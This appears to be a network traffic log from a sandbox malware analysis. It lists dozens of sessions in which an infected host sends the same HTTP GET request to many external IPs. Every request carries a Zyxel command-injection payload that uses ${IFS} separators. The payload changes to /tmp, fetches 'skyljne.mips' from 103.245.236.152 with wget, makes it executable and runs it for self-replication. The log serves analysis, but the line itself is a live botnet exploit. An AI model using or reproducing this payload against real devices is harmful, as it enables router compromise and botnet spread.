                                      Jan 14, 2024 15:50:36.047074080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1643192.168.2.1452684162.221.226.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047125101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1644192.168.2.14355961.36.43.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047171116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1645192.168.2.144643282.200.239.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047195911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1646192.168.2.144464678.60.19.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047240019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1647192.168.2.1445050204.72.231.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047278881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1648192.168.2.1452322158.104.145.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047323942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1649192.168.2.1458358186.1.152.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047348022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1650192.168.2.144389088.62.207.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047393084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1651192.168.2.144419447.71.117.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047447920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1652192.168.2.1445536204.100.236.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047480106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1653192.168.2.145027084.182.171.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047504902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1654192.168.2.1453980164.155.126.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047574997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1655192.168.2.143490617.125.186.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047642946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1656192.168.2.1440736149.218.8.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047686100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1657192.168.2.1442396131.176.55.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047724009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1658192.168.2.146006057.54.12.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047781944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1659192.168.2.1457956170.140.234.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047821999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1660192.168.2.1448162113.62.159.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047863007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1661192.168.2.1442648113.78.0.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047895908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1662192.168.2.1457188201.239.253.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047950983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1663192.168.2.1457742105.211.239.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047957897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1664192.168.2.144877847.50.79.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048022032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1665192.168.2.1434102158.32.1.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048067093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1666192.168.2.145481094.136.59.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048091888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1667192.168.2.1459260154.47.64.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048120975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1668192.168.2.1454292140.67.250.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048171997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1669192.168.2.143756054.90.216.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048209906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1670192.168.2.1445430194.172.18.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048242092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1671192.168.2.145062682.190.69.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048275948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1672192.168.2.145464448.106.42.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048310041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1673192.168.2.1445314190.5.36.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048357010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1674192.168.2.1434986184.130.76.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048396111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1675192.168.2.1450566202.145.245.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048437119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1676192.168.2.1449840166.194.184.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048469067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1677192.168.2.145967244.55.122.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048525095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1678192.168.2.1440546126.103.104.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048549891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1679192.168.2.143710236.13.44.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048583031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1680192.168.2.145142025.0.137.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048629045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1681192.168.2.1438896172.239.60.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048655987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1682192.168.2.144613053.228.23.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048703909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1683192.168.2.1432866163.174.16.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048753977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1684192.168.2.1456442108.225.78.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048789978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1685192.168.2.144528213.188.34.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048818111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1686192.168.2.1438754116.239.3.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048867941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1687192.168.2.1434128182.118.16.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048888922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1688192.168.2.144818694.201.203.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048932076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1689192.168.2.144128662.12.154.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.048960924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1690192.168.2.1438330161.229.125.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049012899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1691192.168.2.1457896155.237.241.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049041033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1692192.168.2.1445966102.246.88.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049094915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1693192.168.2.1452382109.116.36.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049135923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1694192.168.2.1435442203.128.212.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049170017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1695192.168.2.1436866192.159.110.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049211979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1696192.168.2.1440324143.211.216.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049241066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1697192.168.2.1452412196.33.221.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049285889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1698192.168.2.1442716171.206.110.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049310923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1699192.168.2.1457496105.30.251.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049372911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1700192.168.2.1448838164.86.224.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049401999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1701192.168.2.1456410216.202.142.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049431086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1702192.168.2.1438620120.175.151.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049493074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1703192.168.2.1449694138.163.178.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049525976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1704192.168.2.1453020169.223.123.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.049552917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1705192.168.2.144302837.76.219.92443
                                      TimestampBytes transferredDirectionData
